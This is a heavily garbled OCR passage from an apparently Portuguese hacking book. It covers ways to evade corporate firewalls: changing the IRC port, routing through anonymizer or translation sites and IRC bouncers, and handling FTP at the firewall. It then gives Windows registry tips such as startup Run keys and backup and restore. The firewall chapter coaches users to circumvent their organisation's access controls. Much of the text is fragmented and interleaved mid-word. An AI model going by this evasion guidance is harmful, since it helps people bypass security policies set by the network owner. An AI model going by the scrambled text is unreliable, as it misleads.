no firewall; e um desconversor para, assim que o dado chega a nós, con

uatro pontos de encontro de nossos dados com o firewae ele chega no firewall, o ponto em que

erno, o ponto em que ele volta do mundo

cisaremos de conversores ou desconversores. Um Conversor para tornar nossos dados que saem de inválidos para inválidos; um desconversor para, já na rede externa, transformar

formato convencional, a fim de que o servidor/aplicativo de destino possa entender; uma vez que a aplicação destino respondeu, um reconversor para passar esta resposta como válida

seguirmos entendê-lo.

Na realidade o conversor e desconversor da rede interna, assim como o desconversor e reconversor da rede externa, são um programa só.

No caso IRC; a única coisa que precisamos fazer é acessá-lo por uma porta diferente da que ele está usando (6667).

Na pratica no mirc ou o aplicativo que estiver usando para salas de bate-papo

Na tela de editar o provedor no nosso exemplo aparece assim:

Terrorismo Tecnológico Aprenda Para Sobreviver

250

Agora é só mudar a porta ficando assim:

Terrorismo Tecnológico Aprenda Para Sobreviver

251

Pronto é só conectar e o firewall nem percebera nada!

Mas no caso do cliente de IRC, o programa permitia mudar a porta de conexão porém pode ser que não tenhamos esta facilidade no programa que tivermos querendo usar. Aí sim que precisaremos dos conversores!

14.5.1 Enganando o impedimento de sites pornográficos através do nome.

pela web quando aparece a palavra “sexo”.

mas em uma matéria científica, por exemplo, mas mesmo assim o firewall a barra.

14.5 Então vamos lá:

O administrador programou o seu firewall para impedir o acesso

Muito se pode discutir deste método, já que muitas vezes esta palavra aparece em sites sem conteúdo pornográfico,

Neste caso teremos que usar um conversor mas é muito simples pois na Internet a sites que fazem isso automaticamente e assim não precisaremos configurá-lo, esses sites funcionam geralmente para você ficar anônimo na rede ou para traduzir textos, porém acabam funcionando também como conversores como o http://www.anonymizer.com (proteção de privacidade) e http://www.babelfish.com (tradução). A forma de funcionamento básica é: você entra um endereço em um formulário do site, e o site faz todas as requisições HTTP pra você, repassando como se fossem locais dela.

Terrorismo Tecnológico Aprenda Para Sobreviver

252

E pronto conteúdo liberado!

14.5.2 Endereços WWW proibidos por nome.

Todas as transações ocorrem de forma completamente correta para o firewall. O browser web conecta-se no site http://www.anonymizer.com - que é permitido - e o usuário entra um URL no formulário do site: http://www.sexo.com O próprio site do anonymizer faz as requisições para o site pornográfico, assim como carregar todas as figuras. Isto está na rede externa, fora do controle do firewall. E repassa para o cliente com os links modificados, como se fosse uma página local de http://www.anonymizer.com

14.6 Como bloquear então?

ntão se você é o administrador como bloquear? Simploes bloqueie os sites de conversão, pelo menos os mais

w c ww.babe .com

a

E

http://w w.anonymizer. om e http://w lfish

Porém nunc estará 100% segucro o qu

d q

u is r n todo mundo e explicando que não se pode entrar nesses sites e dar bons motivos para que os

rios c , m ç a er d

, a nãã

ser e passe o restoda vida buscan o sites ue façam a onvers o!

É m ito ma fácil i pedi do pra

usuá não a essem e se tiver te po fa a um promessa, pois vai s ifícil!

Terrorismo Tecnológico Aprenda Para Sobreviver

253

14.7 O mais utilizado é o IRC vamo

C e y ido pelo RFC 1459, mas com s e e a te, foi um to

Jarkko Oikarinnen em 1989 para estender o protocouma interface mais poderosa de confe cias e conv l. Trata-se de uma conversação em um ambiente distribuído com

s usuários t l ári s interligados entre si.

Define porta (TCP) acima de 1024 do program6 r i

Com a popularização, o IRC passou a adotar outras portas no servidor: de início, 6667 a 7000; algum tempo depois, perdeu-se o padrão - qualquer porta acima de 1023 era usada para definir um servidor. Como exemplos, temos a rede BrasNET de IRC, brasileira, qu 8000 e 9000, e inúmeras portas “não-oficiais” adotadas pela maioria dos ser

s estudá-lo um pouco mais!

IRvária

- Internxtensõ

t Relas usad

Chas atu

t, definalmen pro colo criado por

lo talk do Unix a ersação virtuarên

vário simul âneos, espa hados por v os servidore

a cliente com a porta 6 67 do p ograma serv dor.

e também utiliza para todos os servidores as portas

vidores, como 4400, 8888 e 31337. Uma lista de servidores com suas respectivas portas pode ser obtida de sites como http://www.irchelp.org.

Vai ser um pouco difícil o administrador ter proibido todas as portas então é só procurar uma, geralmente ele só proíbe a 6667 mesmo.

14.7.1 Mas e se o provedor de IRC só funcionar

ntão temos que usar um servidor PROXY de IRC. Para saber mais sobre o Proxy consulte uma parte só dele, neste mesmo livro!

pela porta 6667?

E

Terrorismo Tecnológico Aprenda Para Sobreviver

254

Um cliente d ll, que seja modificado para oferecer suporte a um proxy de IRC. Na prática, quase todos os clientes de IRC têm esta modificação.

dade - quanto um servidor que o interessado na evasão tenha configurado, na internet, pa

r ouve pela porta 1080, uma porta comum para Proxies de IRC.

O servidor de IRC, na rede externa, que será alcançado pelo Pro

caso do FTP?

O FTP é sem dúvida o mais complicado de todos! E isso se deve, pois é o protocolo mais complexo e complicado do que todos os outros protocolos da Internet. Para começar, envolve duas conexões (uma de dados e uma de controle); depois o cliente também pode ter que fazer papel de “servidor” - quando o cliente pede um arquivo, o servidor diz para ele abrir determinada porta, para então criar uma conexão de dados com o cliente e mandar o arquivo.

ntão a porta pela qual o cliente ouve é aleatória, acima de 1023, e somente será aberta na ocasião da conexão. O Firewall teria que

e IRC, situado dentro do firewa

Um servidor Proxy de IRC, alcançável por uma porta liberada pelo firewall, na rede externa. Consideraremos tanto servidores públicos - que existem com esta exata finali

ra redirecionador suas conexões. (um pequeno detalhe - um proxy de IRC também é chamado de “bouncer”, ou quicador) Consideraremos que o bounce

xy de IRC na porta 6667.

14.8 E no

E

dei ar haver conexões com a rede interna de todas as portas de xusuário.

Terrorismo Tecnológico Aprenda Para Sobreviver

255

Direção Origem Destino Prot. Porta de Origem

Porta de Destino

Bit TCP ACK

Comentário

Dentro Externa Interna TCP >1023 21

Não (*)

Requisição FTP vindo

Fora Interna Externa TCP 21

>1023 Sim Resposta à requisição

Fora Interna Externa TCP

20

>1023 Não (*)

Modo normal, criação de canal de

dados

Dentro Externa Interna TCP >1023 Sim Modo normal, resposta da criação

20 de canal de dados

Dentro Externa(*) criação de canal de

Interna TCP >1023 >1023 Não Modo passivo,

dados

Fora Interna Externa TCP >1023 >1023 Sim Modo passivo, resposta da criação de canal de dados

Fora Interna Externa TCP >1023 21

Não (*)

Requisição de saída de FTP

Dentro Externa Intern21

Resposta à requisição de saída

a TCP >1023 Sim

Den rot Externa Interna TCP

20

>1023 Não (*)

Modo normal, Criação de canal de

dados para requisição de saída

Fora Interna Externa TCP >1023 Sim Modo normal, resposta da criação

da requisição de 20 saída

Fora Interna Externa TCP >1023 >1023 Não (*)

Modo passivo, Criação de canal de

dados para requisição de saída

Dentro Externa Interna TCP >1023 >1023 Sim Modo passivo, resposta da criação

da requisição de saída

Terrorismo Tecnológico Aprenda Para Sobreviver

256

Vejamos no quadro!

(*) => Os pacotes s .

om a maneira de se fazer então é o Proxy, que tem conexão dir a

ubseqüentes virão com ACK ligado

Bte com o servidor FTP, transformar a lista de arquivos em um

documento HTTP, e repassá-lo assim para o cliente.

Não há outra forma! Pelo menos até agora.

Existem muitas outras formas de se enganar o firewall como o http por ppp, e outras mas essas apresentadas são as mais fáceis de se fazer! Porém é só usar a criatividade

e imaginação ssível! para ver o que é po

14.9 Para o Administrador:

Nunca instale um firewall e mande-o configurar com configurações padrão, e mesmo assim não confie totalmente nele já que é facilmente burlavel, basta ter imaginação!

r res a os que conseguirem te enganar!

e maneira alguma quero que isso seja usado para enganar,

È mais fácil educar os usuários que proibir. Além de conseguiultados você não ficará com cara de chato, ou de tolo par

Dpara burlar sistemas, destruir reputações do firewall, só quero é mostrar que eles são falhos e não é prova de segurança nenhuma!

Terrorismo Tecnológico Aprenda Para Sobreviver

257

Capítulo XV

Registro E dicas de Windows

Terrorismo Tecnológico Aprenda Para Sobreviver

258

15.1 O que é o registro do Sistema?

um lugar oculto do Windows onde são armazenadas todas e

qualquer tipo de informação a respeito da configuração de seu sis

15.3 E como ele sabe?

É simples toda a vez que você desliga o seu computador o

sis ma operacional vai ao Registro e atualiza todos os dados até aq

15.4 Então...

É

tema(Win98/95/ME/NT/2000/XP), ou seja, tudo o que é feito é também registrado no Regedit.

15.2 O que acontece? Toda vez que você inicializa o sistema o Windows verifica

todas as configurações possíveis do Registro, como tipo de hardware utilizado, software, configurações adicionais (papel de parede, caminhos de arquivos, registros de softwares, configurações de Internet, arquivos essenciais para inicialização do sistema. Por isso ele também sabe se você acrescentou algum hardware no sistema, ele compara suas tabelas)!

teuele exato momento. Pronto, feito isso até o seu último papel de

parede utilizado é registrado e também tudo aquilo que foi citado acima. Feito isso o usuário já pode desligar o seu computador, e da próxima vez que o sistema for carregado estará tudo no lugar e do jeito que você configurou.

Terrorismo Tecnológico Aprenda Para Sobreviver

259

O regist rado e

modificado. Primeiro você deve ir a INICIAR/EXECUTAR. Execute o arquivo regedit.exe (digite regedit e Enter), abrirá uma janela, agora é

ro do Windows é muito fácil de ser explo

só editar o registro do seu S.O. Umas das ferramentas mais utilizadas é a LOCALIZAR que fica no menu EDITAR, com ela você pode localizar o que quiser e alterar o que quiser.

Vejamos algumas pastas do editor de registro (regedit.exe):

15.4.1 Hkey_Local_Machine Contém informações específicas sobre o tipo de hardware,

software, e outras preferências de um determinado PC. Esta informação é usada para todos os suários que anotam sobre este computad

15.4.2 Hkey_Current_Config

e \Config. Ch q hardware

e pedaços de informações relativo à Tomada do

Sistema e configuração de Jogo. Esta informação é DINÂMICA e

uor.

Esta Chave aponta a uma filial do Hkey_Local_Machinave ue contém informação sobre a configuração de

atual.

15.4.3 Hkey_Dyn_Data

Esta Chave aponta a uma filial de Hkey_Local_Machine qu

contém vários

Terrorismo Tecnológico Aprenda Para Sobreviver

260

significa é

15.4.4 Hkey_Classes_Root

filial de Hkey_Local_Machine que de eve certas colocações de software. Esta Chave contém informação essencial sobre OLE e arrasta e derruba operações, atalho

15.4.5 Hkey_Users

15.4.6 Hkey_Current_User

e hardware or exemplo, pode conter

info o o ma

ração

que pode mudar como dispositivos é somado ouremovido do computador.

Esta Chave aponta a uma scr

s, e aspectos de caroço do Windows 95 GUI.

Esta Chave contém informação sobre os usuários que anotam

sobre o computador. Informação genérica e específica é usada, e cada usuário que usa o sistema tem o próprio Subkey deles/delas.

Esta Chave aponta a uma filial de Hkey_Users para o usuário

que é atualmente anotado sobre o sistema.

15.4.7 Hkey_Local_Machine\Config Contém informações sobre configurações d

alternadas para o computador. Prmação sobre configurações múltiplas pode ser usado quand

computador é conectado a uma rede, quando é undocked de uestação ancorando, e assim por diante. Cada configu

Terrorismo Tecnológico Aprenda Para Sobreviver

261

alternada é nomeada um identificador diferente, e esta configuração ID ave de Config. Cada configuração aparece na lista de perfis de hardware na opção de sistema no Painel de Controle.

l_Machine\Software contém informação de configuração sobre tudos softwares que pode escrever informação no Registro. As entradas nesta chave solicitam qualquer um usando este computador de particular, e inclui definições para associações de arquivo e i ubkey de software con oma quando registrando uma apli

s-

15.4.9 Hkey_Local_Machine\System

Hkey_Local_Machine\System são organizados em jog

os dados que controlam startup é descrito no subHk

informações que controla startup de sis adeia do computador e o subsistema começar. A chave de Serviços contém informações para controlar a con de drives, sistemas de arquivo, e assim por diante. O dados na chave de Serviços também controlam estes serviços e cha

têm um subkey debaixo da ch

15.4.8 Hkey_Local_Machine\Software O subtree de Hkey_Loca

nformação de OLE. O stém, por exemplo, a informação você s

cação para usar uma extensão de filename específica e informação somou durante instalaçãode aplicações Windowbaseadas.

os emO dados de controle que contêm um jogo completo de parâmetros para

os drives de dispositivo e serviços que podem ser carregados com Windows 95. Todos

tree de CurrentControlSet debaixo de ey_Local_Machine\System. Este jogo de controle tem duas

partes: A chave de Controle contém

ma, inclusive o nome de cte

figuração

mam um ao outro.

Terrorismo Tecnológico Aprenda Para Sobreviver

262

5.5 Antes de começar faça um backu1 p

r o BACKUP DO REGISTRO?

r/Executar/Digite: Regedit/Enter. . Na janela do Editor de Registro clique no menu

Re de Registro. . Agora de um nome para o arquivo que irá armazenar toda

o c gestão: Registro). . Marque a opção Todos na caixa intervalo de exportação. . Indique o caminho onde esse arquivo será

armazenado(pode ser qualquer lugar, de preferência um que você não esqueça).

urações estão a salvo.

sta System do Windows os arq uete ou outro lugar qualquer. (Prefiro o 1º método).

15.5.2 Como recuperar o seu REGISTRO caso

Bom, há várias maneiras de realizar a devida restauração do registr

15.5.1 Como faze

Método 1: 1. Clique em Inicia2gistro/Exportar Arquivo3ópia do seu registro. (Su45

6. Clique em OK e pronto, seu Registro está todo seguro. Todas as suas config

Método 2: Uma outra forma é copiar da pauivos System.dat e User.dat, para um disq

seja danificado?

o de seu sistema caso tenha ocorrido algum desastre como instalação de programas inconvenientes, exclusão de chaves ou itens do registro, alteração indevida por parte de usuários não

Terrorismo Tecnológico Aprenda Para Sobreviver

263

autorizados, problemas na inicialização do seu sistema e formatação do disco rígido.

Método 1: Computador ializão, mas acusam

falt ic rrência de o e mais ac

1 m edit/Enter.

Re rt

o e cliq . con g

s

1 o arquivo de Backup e de um clique duplo em cima dele. O seu conteúdo será adicionado ao Registro. (Um dos métodos mais fáceis).

2 r o seu micro.

o do System.dat e User.dat :

se dos devidos arquivos, você deve copiá-los para dentro da pastam System do Windows.

es com o Win95/98/NT que inica ou modif configuraçãontece) :

ação de determinados arquivos ou uma oco desastrosa por parte do próprio usuário(o qu

. Clique e 2. Na janelagistro/Impo

Iniciar/Executar/Digite: Reg

do Editor de Registro clique no menu ar Arquivo de Registro.

3. Busque ue em abrirteúdo do re 4. Reinicie Método 2 : . Localize

. Reinicia

Método 3: Substituiçã

1. Com pos

arquivo de backup que foi criado (se é que foi) O conteúdo desse arquivo será adicionado aoistro danificado.

u computador. e

Terrorismo Tecnológico Aprenda Para Sobreviver

264

2 cro. Método 4: Computadores com o Windows 95 instalado e que não possuem

Ba g

oa ensagem iniciando o Windows 95 tecle

F8. 3. E no

DIGITE: CD C:\WIND

DEP NTES COMANDOS,

. Reiniciar o seu mi

ckup do Re 1. De um b2. Quando

ntre

istro:

ot na máquina e entre no prompt do Dos. parecer a m

prompt do Dos

OWS

OIS DIGITE OS SEGUIPRESSIONANDO ENTER DEPOIS DE CADA.

U R.DA0 CONTÊM O NÚMERO ZERO)

s

a -s

s

s

a

(OBSERVE Q attrib -h -r - ttrib -h -r

attrib -h -r - attrib -h -r - 4. Reinicie

Método 5 :

E SYSTEM.DA0 E USE

system.dat

system.da0

user.dat

user.da0

máquina.

Terrorismo Tecnológico Aprenda Para Sobreviver

265

Computadores com o Windows 98 instalado e que não possuem Backup do Registro:

1. De um boot na máquina.

enu de inicializações do Windows 98.

s

S : lização do sistema

Scanreg/Res s sem

problemas. Ele é a melhor maneira

O pr r preciso realizar a restauração dos Arquivos do o odas as

o nome da Lixeira

F040-5081-101B-9F08-

2. Tecle CT

3. Escolha4. Digite :

canreg/fix

RL até que apareça o m

omente prompt de comando.

se quiser restaurar a cópia da última inicia.

tore: se optar por datas de inicializaçõe oferece 4 opções de datas .(Para mim essa).

bs : Sem

seu Registr alterações s

e que fo você deverá reinicializar o sistema para que t

ejam reconhecidas.

15.6 Dicas:

Mudando a- Abra o RegEdit (regedit.exe) b- Localize por: {645F00AA002F954E}; c- Dê dois clicks em padrão e ALTERE O NOME...

Tirando itens drão dpa a

Área de Trabalho

os items de sua área de Quando o Win95 é

a- Abra o regedit.exe b- Vá para seguinte pasta: Hkey_Local_Machine\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace] c- Lá você encontrarátrabalho. d- Remova os que você quiser e PRONTO...

Terrorismo Tecnológico Aprenda Para Sobreviver

266

ins ,

icon ue você não consegue

remover da

tra ,

c

removê-los

cuperá-lo... talado

ele cria es q

área de balho

que é o caso da lixeira, meu

omputador, caixa de entrada... Se você

quer

siga os passos abaixo:

MAS LEMBREM-SE: se você remover algum ítem, não será mais possível re

Adicionan

dicas do dia para a entrada

do

NT.

do novas

Win95/98/

\Software\Microsoft\

ra é só adicionar assim: c- Click no lado direito com o botão direito do mouse e selecione: novo e depois valor de sequência d- Numere-o (como 51, se adicionar outro, 52 e assim por diante...) e- Depois de um duplo click em DADOS e escreva a dica...

a - Abra o regedit.exe b- Abra a seguinte pasta: H_KEY_LOCAL_MACHINEWindows\ CurrentVersion\explorer\Tips e pronto ago

Alterando a- Abra no regedit:

Terrorismo Tecnológico Aprenda Para Sobreviver

267

o sistema de 16-bit

(nomes para 32-bit

longos em qualquer

ou 32 bit). A

tipo us

HKEY_LOCAL_MACHINE\System\CurrentContr

com

que 0 (zero) como valor binário completo. arquivo de qualquer software sendo 16

quelesnomes do

Me~documen

tos.

olSet\ Control\FileSystem b- Dê um duplo click no lado direito da telao botão direito do mouse c- Escolha novo, valor binário d- Nomeie-o de: NameNumericTail e dê enter e- Dê um duplo click no valor que você criou e colof- Click Ok e reinicie o Windows.

Aumente a

velocidade do menu

INICIAR.

ra seguinte pasta: top

ito da tela, click com o botão

EQUÊNCIA. d- Nomeie esse valor de MenuShowDelay e mude seu valor para um número de 1 à 10 (1 é o mais rápido).

a- Abra o regedit.exe b- Vá paHKEY_CURRENT_USER\Control Panel\deskc- No lado diredireito do mouse, escolha NOVO, depois VALOR DE S

M

defa de usuários e empresas.

a- Abra o regedit.exe b- Abra HKEY_CURRENT_USER\Software\Microsoft\MS SETUP (ACME); c- Você notará que no lado direito da tela tem os

quência: DefCompany

udando nomes

ult

seguintes valores de se(empresa de ou de compania) DefName (Nome de registro)

Terrorismo Tecnológico Aprenda Para Sobreviver

268

- Para alterá-los basta dar dois clicks em cada..

.

MUDE OS

WINDOWS (Versão,

RO

dificar os ítems, basta dar dois clicks obre eles...

DADOS DO

NOME, OEM .

a- Abra o regedit.exe b- Vá em: HKEY_LOCAL_MACHINE\SOFTWARE\MICSOFT\JANELAS\CURRENT version c- Você notará que do lado direito da tela, existem vários valores... Mude os que você achar conveniente... - Para mos

Mudando

Meu Computad

or.

o ícone do a- Abra o regedit.exe b- Mande localizar pelo nome: Meu Computador c- Aperte o TAB para ir para a chave binária e dê um duplo click na mesma... d- vá para default icon e do lado direito da tela aparecerá o local do ícone, é só trocar o endereço para o que tem o ícone desejado.

Se você deseja

que rograma sejam

s ao

Windows

ps

executado

iniciar o

sem que apareça

I

a- Abra o regedit.exe b- Vá para a seguinte pasta: HKEY_CURRENT_USER\Software\Microsoft\Windows\CURRENT_VERSION\RUN c- Adicione um novo valor de sequência do lado direito da tela, dando um click com o botão direito do mouse e escolhendo NOVO. Digite algum nome parecido com o programa. d- Depois de ter nomeado, de um duplo click em

dereço completo do

no menu NICIAR.

DADOS e coloque o enarquivo.

Se você deseja

com FIXO

deixar um diretório

bra o regedit.exe

EY_CURRNT_USER\Software\Microsoft\Curr

a- Ab- Abra a seguinte pasta: HKent_Version\Explorer\User Shell Folders c- Criem um novo valor de sequência como

Terrorismo Tecnológico Aprenda Para Sobreviver

269

para

documentsalvar seu

os e quer que todos

d

mandem salvar

diretamente nele, faça o

s

de: Personal e- e edite seus dados colocando o edereço da

os editores e texto e

etc...

eguinte.

explicado no ítem acima. d- Nomeie-o

pasta desejada para se tornal DEFAULT

Desligando a

nimaçãodas

a

janelas Você pode desligar a a

quando

minimiza

ma za

a ela da

eie e

animação) ou 1 rogramas e

nimação mostrada

você

ou ximi

janelas.

Abra RegEdit e selecione . HKEY_CURRENT_USER, Control panel, Desktop, WindowMetrics . Aperte o botão ddireita do mouse num espaço vazio na jandireita. . Selecione new, string value . Renomo novo valor para MinAnimate . Dê duplo cliquem MinAnimate e entre 0 (desliga (liga) . Feche Regedit e todos os preboot.

DICA especial: SE VOCÊ

QUER QUE NÃO

seu computador e então não terá

... se quiser APAREÇA

MAIS

1- ABRA O msdos.sys no editor do msdos2- Procure pela seção [opções] 3- Acrecente a seguinte linha a essa seção: logo=0 4- Reinicieaquela tela... Lembre-se que o padrão é "Logo1"

Terrorismo Tecnológico Aprenda Para Sobreviver

270

AQUELA ELA

CHATA DO

INICIAR

SEGUINTE:

T

WIN95 AO

FAÇA O

tornar a essa opção. re

Você já

pe ,

quando

d mouse em

cima de algum

ícone na desktop,

quase que

janela de

a

ícone faz.

m

regedit.exe

1-101B-9F08-0AA002F954E}, após isso, você verá que do

ip, dê dois clicks no

foTip e modifique-o, depois para conferir é so

s que tem esse InFoTip, e os

andando colocar m novo valor de sequência e nomeando-o de

deve ter rcebidoque

você eixa o

aparece

uma

help marela

disendo o que

aquele

Se você deseja odificar o mini

- Entre no -Mande, por exemplo, localizar a chave da lixeira: {645FF040-5080lado direiro da tela, existem dois valores, um é oPadrão e o outro é o InfoTInir ao desktop, deixar a lixeira selecionada e deixar o mouse sobre ela... Você pode fazer issocom todos os íconeque não tiver, é só você criar, muInfoTip...

Terrorismo Tecnológico Aprenda Para Sobreviver

271

help desses

faça o uin

ícones,

seg te: Acabe

rompt deLogoff.

Aquele do

com o P

menu

Logoff de

1. Execute o registro 2. Abra as pastas na sequência: Meu Computador/HKEY_CURRENT_USER\Sotware\Mi

omo : NoLogoff. Pressione enter e defina o seguinte valor : 01 00 00 00. Pronto, de um boot.

iniciar Efetuar

<Nome-do-

usuário>

crosoft\Windows\CurrentVersion\Polices\Explorer. Escolha Editar|Novo\Valor Binário. Nomeia a nova entrada c

Acabe

favoritos nIniciar .

1. Abra o editor de Registro. 2. Abra as pastas na sequência: Meu Computador/HKEY_CURRENT_USER\Sotware\Mi crosoft\Windows\CurrentVersion\Polices\Explorer. Escolha Editar|Novo\Valor DWORD. Nomeia a nova entrada como : NoFavoritesMenu. Pressione enter e defina o seguinte valor : 01 00 00 00. Pronto, de um boot.

com o menu

o Menu

Recebe mensagens do tipo

Found ? Site Not

1. Abra o editor de Registro. 2. Abra as pastas na sequência HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\VXD\MSTCP. Escolha Editar|Novo\Valor da Sequencia. Nomeia a nova entrada como : DefaultTTL Clique com o botão direito do mouse sobre a nova entrada e escolha modificar e digite 64.

Eliminar 1. Abra o editor de Registro.

Terrorismo Tecnológico Aprenda Para Sobreviver

272

p

i

2. Abra as pastas na sequência HKEY_CURRENT_MACHINE\Software\Microsoft\Windows\CURRENT_VERSION\RUN

have. Você pode até mesmo rá

rogramas que

nsistem em

aparecer na

incialização do

Windows .

Verifique se existem nomes suspeitos de programas nessa cdeletar todos esses arquivos, o windows teuma inicialização mais rápida . Vela também : RunOnce, RunOnceEx, RunServices e subkeys de RunServiceOnce. De um clique duplo em cima deles e verá a sua localização e para quais programas eles apontam.

O CD dos P

Cds e

registro

w com

programas case sempre

indesejáveis,

vejamos como

eliminá-los

manualmente .

. Abra o editor de Registro

t\IEveXFiles.

A

ACHINE\Software\Microsoft\A

CHINE\Software\Microsoft\IE

osoft\Anfo.

soft\A

soft\A

rovedores . Estes

ntopem o

do indows

12. Apague as seguintes chaves : HKEY_LOCAL_MACHINE\Software\Microsof4\SETUP\Acti HKEY_LOCAL_MACHINE\Software\Microsoft\ctiveSetup\Chanels. HKEY_LOCAL_MctiveSetup\ComponentProgress\IE4. HKEY_LOCAL_MA4\Options HKEY_LOCAL_MACHINE\Software\MicrctiveSetup\InstallI HKEY_LOCAL_MACHINE\Software\MicroctiveSetup\Jobs\Job.IE4. HKEY_LOCAL_MACHINE\Software\MicroctiveSetup\Installed\Componentes\>{60B49E34C7CC-11D0-8953-00A0C90347FF}UOL3456UOL

Terrorismo Tecnológico Aprenda Para Sobreviver

273

Página Inicial. Você

poderá altear a página icial do seu

navegador.

\Software\Microsoft\Int

in

HKEY_LOCAL_MACHINEernet Explorer\Main.

Arquivos

stes Cds de

rovedores de

acesso

C:\Windows\System\Homepage.inf

cópias.

Intrusos que são

instalados no seu

compotador por

C:\Windows\System\Iedkcs32.dll C:\Windows\System\User.dat C:\Windows\System\Wavemix.ini Faça um backup desses arquivos antes de instalar esses Cds de provedores depois é só restaurar a configuração original com essas

e

p

sem a sua permição.

Modificar a or

d

tentou instalar

um

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi n\Setup\SourcePath.

s igen os

oEstando aí é só mudar o endereço dos arquivode instalação.

arquvos de

configuração.

Alguma vez já

Terrorismo Tecnológico Aprenda Para Sobreviver

274

componente do

Windows ou algúm he ele te erguntou caminho

de instalação

do Windows

? Veja

ardware

pa

dos arquivos

como mudar.

Você rola atela do

HKEY_LOCAL_USER\Software\Microsoft\Office\8.0\Word\

Word e nãao sabe on

vai Mude isso

Options. Escolha Editar|Novo\Valor da Sequencia. Nomeia a nova en como : LiveScrooling

1. Da próxima vez que tentar rolar a barra num

de ela parar ?

trada Clique com o botão direito do mouse sobre a nova entrada e escolha modificar o valor e digite

. arquivo grande o deslize será bem suave e gradativo.

Adicionar

Controle ao seu menu

a- Dê um click com o botão direito do mouse sob

menu iniciar; c- Dê um click com o botão direito do mouse em qualquer parte branca do lado direito da tela;

f- Troque o nome "NOVA PASTA" para o

um Painel de

o botão iniciar e escolha EXPLORAR; b- O explorer abrirá visualizando a pasta do

iniciar.

d- Escolha "NOVO" e depois "PASTA"; e- Com isso você criou uma pasta chamada: "NOVA PASTA";

Terrorismo Tecnológico Aprenda Para Sobreviver

275

seguinte código bi (ou se ja escreva tudo que está a seguir

Controle.{21EC2020-3AEA-1069-A2DD-08002B30309D}

GOSTOU??? Você pode fazer isso com qualquer coisa, Meu Computador, Rede Dial-up,

você ter o código binário correto... Como conseguir esses códigos (e muitos outros...)? -

nário

IGUALZINHO...) : Painel de

g- Quando acabar aperte enter. h- Feche o explorer e abra o menu iniciar clickando no botão iniciar...

Impressoras... Basta

Abra o regedit.exe vá em EDITAR, LOCALIZAR e localize por: 21EC2020. ele lhe dará uma lista de VÁRIOS.

Retirando a tela inicial (logo)

15.7 Dicas de Windows Na Internet você poderá achar muito mais dicas de Windows,

estão repletas delas em sites, de hackers, e no próprio site da Microsoft. Uma outra forma é você ler um livro de Windows, mas boa parte dele só vai te enrrolar e não ensinar nada, veja só muitas coisas que da para fazer com o win e que provavelmente você nem sabia, é uma reunião do que tem de mais interessante nesses sites.

15.7.1

Terrorismo Tecnológico Aprenda Para Sobreviver

276

Retire a imagem que aparece ao iniciar o Windows 95 colocando a linha logo=

clique no botão "X" da primeira janela que você quiser fechar. Todas as janelas precedentes serão fechadas.

15.7.3 Abrindo sub-folders

a

tecla ALT e dê um duplo clique ne .

15.7.4 Apagando um arquivo sem mandar para Recycle (lixeira)

T ao apagar um arquivo ele não será andado para o Recycle ao ser apagado.

15.7.5 Diretório de Startup

0 na seção [options] do arquivo MSDOS.SYS.

15.7.2 Fechando múltiplas janelas abertas

Para fechar múltiplas janelas abertas ao explorar Meu

Computador, aperte SHIFT e

Para ver as propriedades de um determinado objeto, aperte le

Se você apertar a tecla SHIFm

Para executar um programa sempre que iniciar o Windows, coloque um shortcut dele no diretório \windows\Start Menu\Programs\Startup.

Terrorismo Tecnológico Aprenda Para Sobreviver

277

15.7.6 Explorer não mostra todos os arquivos

Se o Explorer não mostra as ensões de alguns arquivos, sel s

r file types that are registered"

15.7.10 Forçando copiar ou mover

Se o Explorer não mostra todos os arquivos de um diretório, selecione View/Options e marque "Show all files".

15.7.7 Explorer não mostra as extensões de alguns arquivos

extecione View/Options e desmarque "Hide MS-DOS file extension

fo

15.7.8 Tocando CD automaticamente

O Windows 95, por default sempre toca automaticamente o CD que é colocado no CD-ROM. Para alterar isto, abra o menu View no Explorer, selecione Options e então File Type. Procure Audio CD e selecione Edit...Retire a opção /play da linha de aplicação usada.

15.7.9 Arrastando objetos com botão da direita Arrastar objetos usando o botão da direita funciona do mesmo modo que usando o botão da esquerda, só que aparece um menu onde você pode selecionar se que copiar, mover ou criar um shortcut do objeto.

Terrorismo Tecnológico Aprenda Para Sobreviver

278

Arrastar um objeto com o botão da esquerda não funciona da mesm ivo e um folder para outro em um mesmo disco, ele será movido. Se o lder de destino for em outro disco o arquivo será copiado. Se o

piar, aparecerá um (+) junto ao cursor. Ao mover, ada aparecerá e quando for criado um shortcut, aparecerá uma

seta junto

Em seguida, selecione o folder d tino, clique o botão da direita sobre ele e selecione paste.

15.7.12 Desliga do o NumLock

a maneira sempre. Por exemplo, se você arrasta um arqudfoarquivo arrastado for executável, o que será transferido será um shortcut do arquivo. Para forçar a cópia de um arquivo, aperte CTRL ao arrastar o arquivo. Para forçar a movimentação do arquivo, aperte SHIFT ao arrastar o arquivo. Lembre-se de soltar a tecla do mouse antes de soltar o CTRL ou SHIFT. Em qualquer dos casos é interessante observar o cursor para verificar o que ele está

zendo. Ao cofan

ao cursor.

15.7.11 Copiando e movendo arquivos Clique o botão da direita no arquivo ou folder que você deseja copiar ou movimentar e selecione cut para movimentar ou copy para copiar.

e des

n

Por default o Windows 95 deixa o NumLock ligado. Para que ele fique desligado coloque a linha "numlock=off" no CONFIG.SYS.

15.7.13 Verifivando o tamanho de um folder

Terrorismo Tecnológico Aprenda Para Sobreviver

279

Para saber o tamanho total de um folder (incluindo sub-folders) verifique suas propriedades (botão direito, propriedades ou ALT-ENTER ou ALT-Duplo clique)

15.7.14 Modificando os logos do Win95 Você pode modificar os logos a resentados ao entrar ou sair do Win95. Crie figuras no formato amanho 320x400, 256 cores 95),

gow.sys (ao ser dado o shutdown) e logos.sys (quando pronto ra desligar). Coloque estes arquivos na raiz do disco de boot.

marcar um texto e guardá-l . Faça o seguinte: segure hift e use as setas do teclado para marcar o texto - ou use o botão reito do mouse - você pode selecionar partes de um texto, linhas

ito este recurso durante programação ou quando e tou nos chats.

15.7.16 Acelere o D o seu Windows 95

omputing fazendo isso você terá um aumento de desempenho da rdem de 10%. A Microsoft nunca foi boa em desenvolver drivers

para seus sistemas operacionais, e os drivers dos fabricantes em

p*.bmp no t

, e dê os nomes de logo.sys (apresentado ao entrar no Winlopa

15.7.15 Recortar,marcar e colar

Uma dica muito interessante e útil, e que eu uso o tempo todo, é o na memória

Sdiou apenas palavras. Estando o texto selecionado segure Ctrl e aperte shift, agora o texto está na memória e pode ser colado em qualquer programa usando shift+insert. Eu uso mu

